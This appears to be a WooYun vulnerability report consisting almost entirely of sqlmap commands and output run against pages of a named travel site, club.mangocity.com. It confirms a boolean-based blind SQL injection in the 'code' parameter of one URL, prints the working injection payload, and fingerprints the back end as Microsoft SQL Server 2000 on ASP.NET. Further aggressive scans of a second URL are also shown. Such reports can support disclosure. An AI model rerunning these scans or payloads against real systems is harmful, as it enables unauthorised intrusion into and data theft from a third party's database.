WooYun.org

http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen

sqlmap.py -u "http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen" --threads 10 --dbms "MySQL"

GET parameter 'code' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] y
sqlmap identified the following injection points with a total of 69 HTTP(s) requ
ests:
---
Place: GET
Parameter: code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=xiamen' AND 1236=1236 AND 'JgJI'='JgJI
---
[23:02:16] [INFO] testing MySQL
[23:02:32] [WARNING] the back-end DBMS is not MySQL
[23:02:32] [INFO] testing Oracle
[23:02:47] [WARNING] the back-end DBMS is not Oracle
[23:02:47] [INFO] testing PostgreSQL
[23:03:02] [WARNING] the back-end DBMS is not PostgreSQL
[23:03:02] [INFO] testing Microsoft SQL Server
[23:03:02] [INFO] confirming Microsoft SQL Server
[23:03:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

sqlmap.py -u "http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen" --threads 10 --dbms "MySQL" -p code --level 5 --risk 3 --technique BT

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: code
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=xiamen' AND 8251=8251 AND 'nHZR'='nHZR
---
[18:30:24] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[18:30:24] [INFO] testing MySQL
[18:30:39] [WARNING] the back-end DBMS is not MySQL
[18:30:39] [CRITICAL] sqlmap was not able to fingerprint the back-end database m
anagement system. Support for this DBMS will be implemented at some point
[18:30:39] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 1 times

http://club.mangocity.com/act/toptraveller/show.aspx?type=1&sw=111111

sqlmap.py -u "http://club.mangocity.com/act/toptraveller/show.aspx?type=1&sw=111111" --threads 10 --dbms "Microsoft SQL Server" --level 5 --risk 3 -p sw

[00:38:25] [INFO] testing connection to the target URL
[00:38:25] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[00:38:26] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
 or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[00:38:27] [INFO] testing if GET parameter 'type' is dynamic
[00:38:28] [WARNING] GET parameter 'type' does not appear dynamic
[00:38:43] [WARNING] heuristic (basic) test shows that GET parameter 'type' migh
t not be injectable
[00:38:43] [INFO] testing for SQL injection on GET parameter 'type'
[00:38:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:41:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[00:42:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[00:43:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:43:14] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[00:44:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[00:46:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:51:26] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[01:13:02] [WARNING] GET parameter 'type' is not injectable
[01:13:02] [INFO] testing if GET parameter 'sw' is dynamic
[01:13:02] [WARNING] GET parameter 'sw' does not appear dynamic
[01:13:02] [WARNING] heuristic (basic) test shows that GET parameter 'sw' might
not be injectable
[01:13:02] [INFO] testing for SQL injection on GET parameter 'sw'
[01:13:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:13:02] [WARNING] reflective value(s) found and filtering out
[01:13:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[01:14:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:14:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:15:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:16:47] [INFO] testing 'Generic UNION query (15) - 1 to 10 columns'
[01:16:50] [INFO] target URL appears to be UNION injectable with 2 columns
[01:16:53] [INFO] target URL appears to be UNION injectable with 5 columns
[01:20:42] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[01:21:49] [INFO] target URL appears to have 1 column in query
[01:22:49] [WARNING] GET parameter 'sw' is not injectable
[01:22:49] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. Please retry with the
switch '--text-only' (along with --technique=BU) as this case looks like a perfe
ct candidate (low textual content along with inability of comparison engine to d
etect at least one dynamic parameter). Also, you can try to rerun by providing e
ither a valid value for option '--string' (or '--regexp')
[01:22:49] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 147 times

sqlmap.py -u "http://club.mangocity.com/act/toptraveller/show.aspx?type=1&sw=111111" --threads 10 --dbms "Microsoft SQL Server" --level 5 --risk 3